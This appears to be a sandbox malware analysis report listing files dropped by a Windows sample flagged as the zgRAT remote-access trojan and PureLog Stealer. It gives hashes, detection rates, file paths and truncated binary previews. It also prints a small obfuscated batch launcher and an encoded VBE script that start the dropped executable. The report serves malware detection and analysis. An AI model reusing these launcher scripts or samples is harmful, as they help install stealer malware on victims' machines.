                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Users\user\Desktop\UxpXqoOQ.log

                                                        Download File
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.519109060441589
                                                        Encrypted:false
                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        • Antivirus: Virustotal, Detection: 11%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\VDAxqXDQ.log

                                                        Download File
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        • Antivirus: Virustotal, Detection: 27%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\dVTvzLpX.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):23552
                                                        Entropy (8bit):5.519109060441589
                                                        Encrypted:false
                                                        SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                        MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                        SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                        SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                        SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 8%
                                                        • Antivirus: Virustotal, Detection: 11%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ddDNduPc.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):32256
                                                        Entropy (8bit):5.631194486392901
                                                        Encrypted:false
                                                        SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                        MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                        SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                        SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                        SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 25%
                                                        • Antivirus: Virustotal, Detection: 29%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\ffpwzeUX.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):33792
                                                        Entropy (8bit):5.541771649974822
                                                        Encrypted:false
                                                        SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                        MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                        SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                        SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                        SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 29%
                                                        • Antivirus: Virustotal, Detection: 27%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................

                                                        C:\Users\user\Desktop\mKRcJKjf.log

                                                        Download File
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        • Antivirus: Virustotal, Detection: 22%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\oOILjGZF.log

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):69632
                                                        Entropy (8bit):5.932541123129161
                                                        Encrypted:false
                                                        SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                        MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                        SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                        SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                        SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 17%
                                                        • Antivirus: Virustotal, Detection: 22%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.

                                                        C:\Users\user\Desktop\vnZStDyM.log

                                                        Download File
                                                        Process:C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe
                                                        File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):85504
                                                        Entropy (8bit):5.8769270258874755
                                                        Encrypted:false
                                                        SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                        MD5:E9CE850DB4350471A62CC24ACB83E859
                                                        SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                        SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                        SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 71%
                                                        • Antivirus: Virustotal, Detection: 69%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k

                                                        C:\Windows\Temp\Crashpad\reports\6bc8f6e50ab287

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.358469646481112
                                                        Encrypted:false
                                                        SSDEEP:3:mwLHM0NzyWjO3xCVkDGMZC+H5oRke8:mww+a3oOaMZL5MN8
                                                        MD5:BF012358CC0C86F1701A536E004B33B2
                                                        SHA1:4F55A2DBE09700249B72CB040331137220C6975F
                                                        SHA-256:6C146DE3DE9AFB747F1CA512EA41B83663E859AF45A2B9380ACCE7BCE062212D
                                                        SHA-512:8D9DD0528A49C64F21D1A372C0BDDCA87DAB3C38769C5A84948F649574DC5E3BE17414C745A8C166A51E1D51D505B39B0A2D16196355E481462578B7328F1A49
                                                        Malicious:false
                                                        Preview:DDsmGuMmcxwVBu7uu4bIciBQneQVpAkDDqFOFRAtp6HPApCTaNpAypnfCc9ld06bMsSVptpc3rcgavP8b74cVjPYDkMmSYQy9qCSXrnr

                                                        C:\Windows\Temp\Crashpad\reports\KSFasOVYpBufeMshBMPdEDfTcvlm.exe

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        C:\surrogateFontdhcpCommon\8R9u62iDagU8Uc7aonuPLC09qlpNFRfyF1hoQ7xLsx4xo5Yd8alS.bat

                                                        Download File
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):104
                                                        Entropy (8bit):5.004250987430439
                                                        Encrypted:false
                                                        SSDEEP:3:WTxon3K+ARtyAHoIQqxAjnI3+6TMxoHLM2L4zRn:Uxo6+ULfInA+3oY2kNn
                                                        MD5:84A0520B29117EE45FE684C266E86C3B
                                                        SHA1:2DC7BF59E263FFFAE8CDC3FE230DC09279726A80
                                                        SHA-256:073EB5E2E24AA27DF69B69E9FEE0F8CACD7808247B72F3E1168B272522615BB3
                                                        SHA-512:2716E51C302AD93F9D9711C8198D6C5B15A2C118819B318B33111F37FA84EE132B29808D26BBB39469C0A4EE4B0CD5B074C129E28C77361D889D4F863E6A47ED
                                                        Malicious:false
                                                        Preview:%CvunvjmLeMegRP%%KYO%..%AltHDA%"C:\surrogateFontdhcpCommon/ChainPortServerBrowsermonitor.exe"%nJKTwdrDO%

                                                        C:\surrogateFontdhcpCommon\99a93b5a245da8

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with no line terminators
                                                        Category:dropped
                                                        Size (bytes):166
                                                        Entropy (8bit):5.648240321319942
                                                        Encrypted:false
                                                        SSDEEP:3:vcf9gjmURSx9skA/5Ypw5ohD0ktTsfCGdoTcdoSmN7gvEzgPfn:o9gaU0PsxKpbakFsfZdoTcdoLBIJf
                                                        MD5:55DD91A1A71EF89E223FE06F5F4C0453
                                                        SHA1:623D337801CD53F7A0620317265E065977384B9F
                                                        SHA-256:65B7FBEE46AC997D1E78716BFDE7147A35A01FF71129A90C082AA352AFAAA5F0
                                                        SHA-512:78951AB4B914DF850D82FBE84A975A0D89AEABD70EDBB4F8D23C74C228944B5364D6BD7C001201A2129B404E21306B6A8EECFA52D9C882EDFA17F2C3A9B8EB60
                                                        Malicious:false
                                                        Preview:Iky7IXEe5SAHFK04H14wFhXiWMoY39eeZ5DemtbJLPzJ4QV24FL2FdDlMQl6spl5ygrJHWSXZul0sOnG1wexymZ51cRWIfbfo3VYiMvixxdV2N37meF5LxGMHvRoE5P3SFMy3OhpA5AAIDDoiUtnafT0wIRx4Ge1ikCwAE

                                                        C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        C:\surrogateFontdhcpCommon\OneEFBaC8w.vbe

                                                        Download File
                                                        Process:C:\Users\user\Desktop\cuAvoExY41.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):253
                                                        Entropy (8bit):5.968174814732222
                                                        Encrypted:false
                                                        SSDEEP:6:GEvwqK+NkLzWbHZEG8nZNDd3RL1wQJRkaTKfCeW+098Nmids:GbMCzWL6G4d3XBJYUHC0iC
                                                        MD5:68277663193A50A0F25BEB2B38F1D2EF
                                                        SHA1:84927FB9599B7DC0BD4F1B25ABCDEB75EBF9D762
                                                        SHA-256:F0B970B22CC955B64A660F835A378DCAE06011783CC8BBF30F35269A887DEDB9
                                                        SHA-512:640FC43C16187B39CE868B65560509D5CE7CA1B5B59BDD5CBBF8D25EA8AD3E238220F48FBB953C60A65D7279D2BA9E4EAB4DDDB5BC048B5B402A49BD721463AB
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        Preview:#@~^5AAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2v&T!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ/;MDKolD+wGxDN4maZGhsWxJ&%",E++rfmo`%im{CKx;nd/!O;s2gsIWzwF4W5{XSdXcXW*INRCVUR8lDJS~Z~P6CVk+zEkAAA==^#~@.

                                                        C:\surrogateFontdhcpCommon\ea1d8f6d871115

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:ASCII text, with very long lines (378), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):378
                                                        Entropy (8bit):5.82922407849562
                                                        Encrypted:false
                                                        SSDEEP:6:cWHZzDKt9xxWbEZLVvbwjV3LlBUTHFzOGzC/14Zsh1L/s0ZTycl0GHR9cMtrIvlE:DHtc9x4bEhxbiVbTsHFaP4u1L02TyPOp
                                                        MD5:BE44573738C28AEF11C8F61F47D06F37
                                                        SHA1:6DF35F7A057128659836C0062FF44880496191FB
                                                        SHA-256:EF654B580B63B19D2D0D6BD2EBA63422B452EE417539C33ACB0031AD0B387B98
                                                        SHA-512:E2B34C7F796B779618F999D8B2815260BC9BD7A25624A5CD26E40A7DAEF0CE33FC16A7A98D2B3966451003972DD7445B74B778436F5F5B3B2891CA5C0E89F8E5
                                                        Malicious:false
                                                        Preview:2NT3fhQZrGSXrux1V6fczsmMGc80ZILhcvbWAkn3GMZPRZRRHLIlF4hJlHwDja9j4u56Sb1uTlWmTX4qKqsO9kchORv3yjTpNzUheV8qUYRdh40OMF32rvkUSXsAq76uRqZdCXMysC3kS8ATbgrsqb8bOAOGn79WbhM1fWLy3EKo29BTXYjJQOD0s7OBJFLuDhJvwIxFV2ymRTjP94tOYzFNdVIhHKox3ZlU0PhOldyXZbiZY9COW6WNb5Ra9P8KNAs2sOYtXen5BrxCwtJHHab6CX348GOVfnKZsqrJlS01TbMtIPnQF0CxjvzUVdvRQRaXhYTGCAgzjjnlLJwtc8QokWz61WyHgjlBBzLt5hOFUNN9INJLqCyRBv

                                                        C:\surrogateFontdhcpCommon\upfc.exe

                                                        Download File
                                                        Process:C:\surrogateFontdhcpCommon\ChainPortServerBrowsermonitor.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):1956864
                                                        Entropy (8bit):7.550310758182276
                                                        Encrypted:false
                                                        SSDEEP:24576:6/jcka6RF0Xq5wBy8CXd51UlsyADTXmFNoCYS7+q/f/ng5PPZo+7VIuK:6iydNfyADTXWNoCp73MPPZp7V
                                                        MD5:5FA91A09D2073FA85C2B69A00EA7C1FC
                                                        SHA1:E8D22ECAECABEECB6FA2C3402B8D4B5F31105B47
                                                        SHA-256:4DCF80B093CF4801B969F6301391A281563FBDFC5B7FBFCF8457981E03CA0C61
                                                        SHA-512:C1CAD8E19C33326A3AFADCBE3BDF14D3BFC619A315129F0027275022FA870F1A2310667B0AF7E8FF65F4C0E0E29E937E36D936DD1CD938A4CA78DFF1B235E9F5
                                                        Malicious:true
                                                        Yara Hits:
                                                        • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\surrogateFontdhcpCommon\upfc.exe, Author: Joe Security
                                                        • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\surrogateFontdhcpCommon\upfc.exe, Author: Joe Security
                                                        Antivirus:
                                                        • Antivirus: Avira, Detection: 100%
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 92%
                                                        • Antivirus: Virustotal, Detection: 55%, Browse
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...u..f................................. ........@.. .......................@............@.....................................K....... .................... ....................................................... ............... ..H............text........ ...................... ..`.rsrc... ...........................@....reloc....... ......................@..B........................H.......,...............0.......=........................................0..........(.... ........8........E........*...N...)...8....(.... ....~....{....:....& ....8....*(.... ....~....{....:....& ....8....(.... ....8........0..<....... ........8........E....]...N.......*...............8X......... ....~....{h...9....& ....8....8.... ....~....{f...:....& ....8....8.... ....8....~....(/... .... .... ....s....~....(3....... ....8L.......~....(7...~....(;... ....<H... ....~....{u

                                                        \Device\Null

                                                        Download File
                                                        Process:C:\Windows\System32\PING.EXE
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):502
                                                        Entropy (8bit):4.606362154056947
                                                        Encrypted:false
                                                        SSDEEP:12:POJa95pTcgTcgTcgTcgTcgTcgTcgTcgTcgTLs4oS/AFSkIrxMVlmJHaVzvv:WJ6dUOAokItULVDv
                                                        MD5:479265214B7D40F1F133ADCA59674F38
                                                        SHA1:5CE8DE4410682925D3BB0CDBBB4A03405DEAE389
                                                        SHA-256:524C3EB619E3D256AE2A24827D731AE5943268FC14FFE6D619E2E84C3119C941
                                                        SHA-512:44D56680467E77DF23F04F7134ED52898347930E4A6F2D52287C24C8799BC91A93F10BD0FEC9A09D27FD607303FD0397A1F78486DACC92637C0FF167AD7ED34C
                                                        Malicious:false
                                                        Preview:..Pinging 123716 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 10, Received = 10, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..

                                                        Static File Info

                                                        General

                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Entropy (8bit):7.488244602209198
                                                        TrID:
                                                        • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                        • Win32 Executable (generic) a (10002005/4) 49.97%
                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                        • DOS Executable Generic (2002/1) 0.01%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:cuAvoExY41.exe
                                                        File size:2'278'706 bytes
                                                        MD5:7ddacbfdacd9e8aeacd1b0f2dea51f4e
                                                        SHA1:36667e13972c28da816f52fd4ef2b910e50de531
                                                        SHA256:dc6859bdfc93d108f11e63dc630453b11c0be85446fd448d3c2c1aa5ad4ce077
                                                        SHA512:3d1b6f46e4d0a2d124250efe77d30d5ad03c2cd2db0e5df9d4bdca0c10facb5f546497d7584ca18de1d1c3616ecd5e5d000bb082e7c30a889a2a3415649c28d1
